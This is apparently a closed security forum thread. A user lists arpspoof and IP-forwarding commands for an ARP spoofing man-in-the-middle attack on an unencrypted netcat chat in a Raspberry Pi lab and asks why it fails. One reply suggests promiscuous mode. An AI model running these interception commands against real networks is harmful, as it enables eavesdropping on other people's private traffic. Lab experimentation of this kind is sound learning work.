3

I'm using the following code:

>sudo bash 
>echo 1 > /proc/sys/net/ipv4/ip_forward
>arpspoof -i wlan0 -t [Victim IP] [Gateway IP] #on terminal num.1
>arpspoof -i wlan0 -t [Gateway IP] [Victim IP] #on terminal num.2

And checking the traffic with WireShark, for some reason no information between the Victim and the Gateway is transferred to me, I'm using netcat chat and I want to intercept the chat between the "Victim" and his "friend" (another computer), the chat is not encrypted. I also get a "duplicate use of [Victim IP] detected!" error on WireShark from the Gateway that keeps repeating.

Any idea why its not working?

Using 3 RaspberryPi3 with Raspbian Jessie, on wifi.

closed as off-topic by Xander, kasperd, grochmal, crovers, PwdRsch Dec 8 '16 at 20:13

This question appears to be off-topic. The users who voted to close gave this specific reason:

  • "This question does not appear to be about Information security within the scope defined in the help center." – Xander, grochmal, crovers, PwdRsch
If this question can be reworded to fit the rules in the help center, please edit the question.

2

Try setting your interface in promiscous mode, you can do it as following

ifconfig wlan0 down
ifconfig wlan0 promisc
ifconfig wlan0 up

Maybe it's not necessary to turn down and up the interface

  • actually promisc doesnt enable me to receive all traffic on the router since im not in monitor mode. but even with that its not working. – eyal360 Dec 13 '16 at 8:13

Not the answer you're looking for? Browse other questions tagged or ask your own question.